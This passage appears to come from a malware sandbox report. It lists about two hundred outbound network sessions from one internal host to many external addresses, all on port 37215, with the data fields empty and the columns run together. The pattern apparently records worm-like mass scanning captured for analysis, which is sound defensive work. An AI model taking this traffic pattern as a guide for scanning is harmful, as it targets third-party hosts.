                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15782192.168.2.1334902197.177.225.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15783192.168.2.1348236197.98.9.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15784192.168.2.1354274197.74.194.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15785192.168.2.1360600219.207.87.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15786192.168.2.1358678189.70.21.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15787192.168.2.133480841.243.5.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15788192.168.2.1333504157.84.208.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15789192.168.2.135700241.27.194.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15790192.168.2.1346008197.89.220.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15791192.168.2.1335016157.148.94.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15792192.168.2.133858041.153.231.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15793192.168.2.133376241.114.104.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15794192.168.2.1333058197.84.195.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15795192.168.2.1354946157.216.103.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15796192.168.2.1354950197.234.74.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15797192.168.2.1343096202.83.194.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15798192.168.2.134160641.53.31.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15799192.168.2.1346014115.40.19.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15800192.168.2.134712041.140.223.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15801192.168.2.135565441.28.224.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15802192.168.2.1354716197.86.61.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15803192.168.2.134700441.212.72.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15804192.168.2.1342932157.116.103.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15805192.168.2.134126241.223.187.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15806192.168.2.135923641.149.137.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15807192.168.2.13342529.39.2.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15808192.168.2.1336406191.2.97.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15809192.168.2.1349040157.1.117.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15810192.168.2.135398098.42.97.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15811192.168.2.133624654.131.66.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15812192.168.2.135167641.207.177.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15813192.168.2.1336018176.89.36.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15814192.168.2.1346528197.105.76.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15815192.168.2.135315241.115.103.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15816192.168.2.134228841.117.212.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15817192.168.2.1346934157.54.44.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15818192.168.2.133997450.4.114.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15819192.168.2.1347360197.231.73.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15820192.168.2.133840895.161.6.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15821192.168.2.1352250220.59.63.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15822192.168.2.134380672.169.193.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15823192.168.2.1360796172.59.77.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15824192.168.2.1342454197.151.210.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15825192.168.2.1354504197.61.45.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15826192.168.2.134050041.81.129.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15827192.168.2.133638445.179.9.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15828192.168.2.135898693.38.233.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15829192.168.2.1359280170.233.156.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15830192.168.2.1332888197.52.148.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15831192.168.2.135706641.63.192.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15832192.168.2.1335474197.160.94.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15833192.168.2.1349318197.149.145.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15834192.168.2.1351044157.174.21.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15835192.168.2.133367876.240.140.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15836192.168.2.135939041.79.50.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15837192.168.2.1355400197.62.52.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15838192.168.2.1349752197.62.149.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15839192.168.2.135797641.55.154.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15840192.168.2.135513441.238.213.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15841192.168.2.1357298164.206.75.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15842192.168.2.134554841.210.239.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15843192.168.2.1337200151.253.80.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15844192.168.2.134838641.53.4.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15845192.168.2.1342344204.94.136.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15846192.168.2.1348054205.196.71.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15847192.168.2.1348366204.74.52.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15848192.168.2.1340018197.208.150.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15849192.168.2.1343010197.246.149.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15850192.168.2.1360372197.208.4.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15851192.168.2.1348948197.190.231.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15852192.168.2.135592441.45.112.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15853192.168.2.1333222197.152.25.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15854192.168.2.1347970201.83.196.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15855192.168.2.1355376169.138.49.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15856192.168.2.135659641.154.231.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15857192.168.2.1345412157.144.170.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15858192.168.2.135857641.83.4.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15859192.168.2.135028081.169.163.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15860192.168.2.134230441.122.32.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15861192.168.2.135233419.48.159.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15862192.168.2.135728241.136.129.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15863192.168.2.1356262197.210.83.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15864192.168.2.1356612138.156.110.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15865192.168.2.1336650199.57.16.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15866192.168.2.1335720157.218.217.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15867192.168.2.1335458190.178.255.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15868192.168.2.135733241.251.93.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15869192.168.2.1344670197.18.83.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15870192.168.2.1335908157.37.31.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15871192.168.2.1343708197.146.26.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15872192.168.2.1344048197.210.137.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15873192.168.2.1350730157.80.62.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15874192.168.2.1349238197.83.37.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15875192.168.2.1341934157.174.24.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15876192.168.2.135674041.23.180.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15877192.168.2.135743841.11.176.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15878192.168.2.133859441.141.135.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15879192.168.2.1336740197.14.42.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15880192.168.2.133868639.123.154.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15881192.168.2.1354070197.164.157.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15882192.168.2.133689441.172.134.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15883192.168.2.1340268114.65.104.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15884192.168.2.133522641.225.97.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15885192.168.2.1339496197.179.160.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15886192.168.2.1354106197.78.236.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15887192.168.2.1352822157.103.64.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15888192.168.2.134171254.133.207.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15889192.168.2.1345236157.226.253.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15890192.168.2.133828841.46.5.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15891192.168.2.135401041.240.201.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15892192.168.2.1350136197.248.224.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15893192.168.2.134497841.21.213.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15894192.168.2.135761412.213.129.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15895192.168.2.1357582157.189.38.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15896192.168.2.1354458100.214.13.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15897192.168.2.1333558211.186.115.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15898192.168.2.1345584170.60.39.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15899192.168.2.1340498197.20.73.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15900192.168.2.1351436197.237.45.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15901192.168.2.1338456107.144.146.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15902192.168.2.1360558157.86.230.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15903192.168.2.1348720157.102.112.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15904192.168.2.133989241.174.156.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15905192.168.2.1336010197.191.178.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15906192.168.2.1341028197.12.190.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15907192.168.2.1339736157.47.119.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15908192.168.2.135123041.5.77.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15909192.168.2.135123041.124.193.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15910192.168.2.1359864197.237.244.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15911192.168.2.1357474157.57.118.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15912192.168.2.134485841.144.8.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15913192.168.2.1350858157.197.218.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15914192.168.2.1345744157.148.61.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15915192.168.2.135260241.159.202.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15916192.168.2.1350694197.123.253.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15917192.168.2.1334540157.158.111.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15918192.168.2.1343286197.165.223.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15919192.168.2.1345182197.252.181.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15920192.168.2.135324641.144.40.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15921192.168.2.134325841.64.198.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15922192.168.2.1341254197.237.72.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15923192.168.2.1351714197.140.66.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15924192.168.2.1357138157.5.160.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15925192.168.2.1339232157.226.133.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15926192.168.2.1335932197.131.95.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15927192.168.2.1338106157.100.230.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15928192.168.2.133380241.120.120.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15929192.168.2.1360808197.116.178.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15930192.168.2.1347316157.24.38.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15931192.168.2.134895664.84.120.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15932192.168.2.1346020157.77.113.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15933192.168.2.1354126157.206.23.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15934192.168.2.1333942197.3.30.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15935192.168.2.1356256157.255.3.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15936192.168.2.1333718197.87.62.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15937192.168.2.1334320157.140.171.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15938192.168.2.1359046157.218.235.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15939192.168.2.1358980157.62.105.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15940192.168.2.133562866.89.137.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15941192.168.2.1334416178.180.9.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15942192.168.2.1334448175.20.157.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15943192.168.2.133704241.200.217.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15944192.168.2.134667641.240.72.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15945192.168.2.1337828157.94.139.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15946192.168.2.1343768157.154.139.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15947192.168.2.1359972157.210.148.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15948192.168.2.135825841.246.117.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15949192.168.2.1335958197.165.9.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15950192.168.2.1358160197.217.210.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15951192.168.2.1333408197.142.158.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15952192.168.2.1335872151.230.132.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15953192.168.2.134238641.236.245.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15954192.168.2.1348982153.217.148.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15955192.168.2.134390067.27.169.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15956192.168.2.1338258157.127.78.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15957192.168.2.1359718197.237.68.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15958192.168.2.1344950211.194.35.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15959192.168.2.135759841.4.58.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15960192.168.2.1344486197.81.232.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15961192.168.2.134721441.186.111.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15962192.168.2.133465085.28.120.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15963192.168.2.1336346157.205.55.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15964192.168.2.1352634157.29.189.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15965192.168.2.1350048157.244.211.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15966192.168.2.133921642.182.32.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15967192.168.2.1340636157.187.211.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15968192.168.2.133662441.231.106.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15969192.168.2.133894641.150.46.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15970192.168.2.1338200200.92.250.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15971192.168.2.134047841.218.244.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15972192.168.2.1353276197.53.154.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15973192.168.2.136043241.51.103.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15974192.168.2.1342652157.129.69.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15975192.168.2.1333878197.253.209.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15976192.168.2.135850241.112.240.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15977192.168.2.134207241.84.107.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15978192.168.2.1339452157.203.44.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15979192.168.2.1334196157.56.64.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15980192.168.2.1347474107.183.72.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15981192.168.2.135547474.48.51.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15982192.168.2.1334432197.241.112.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15983192.168.2.135673261.236.130.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15984192.168.2.1348456197.133.240.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15985192.168.2.1333628197.28.121.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15986192.168.2.1355918153.118.186.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15987192.168.2.1348674197.114.56.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15988192.168.2.133437641.252.152.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15989192.168.2.1340914121.172.13.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15990192.168.2.1345258157.49.88.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
